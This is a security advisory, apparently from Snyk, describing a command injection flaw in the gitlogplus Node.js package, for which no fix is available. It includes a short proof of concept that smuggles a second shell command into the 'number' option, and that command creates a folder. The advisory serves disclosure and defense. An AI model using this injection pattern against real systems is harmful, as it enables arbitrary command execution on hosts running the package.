Command Injection Affecting gitlogplus package, versions *


0.0
high
  • Exploit Maturity

    Proof of concept

  • Attack Complexity

    High

  • Confidentiality

    High

  • Integrity

    High

  • Availability

    High

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications
  • snyk-id

    SNYK-JS-GITLOGPLUS-1315832

  • published

    23 Jul 2021

  • disclosed

    2 Jul 2021

  • credit

    Rafal Janicki

How to fix?

There is no fixed version for gitlogplus.

Overview

gitlogplus is a Git log parser for Node.JS

Affected versions of this package are vulnerable to Command Injection via the main functionality, as options attributes are appended to the command to be executed without sanitization.

PoC by Rafal Janicki

# 1. Run `npm i gitlogplus`
# 2. Run `mkdir git && git init git` (creates empty git repository as subdirectory to working directory)
# 3. Commit a file in the repository so that git log has been created
# 4. Run the below JavaScript PoC, which will create a folder HACKED in the parent directory of the new git repository
"use strict"

const gitlog = require('gitlogplus'); const options = { repo: __dirname + '/git', number: '20; mkdir ../HACKED; git log ' };

let commits = gitlog(options); console.log(commits);

References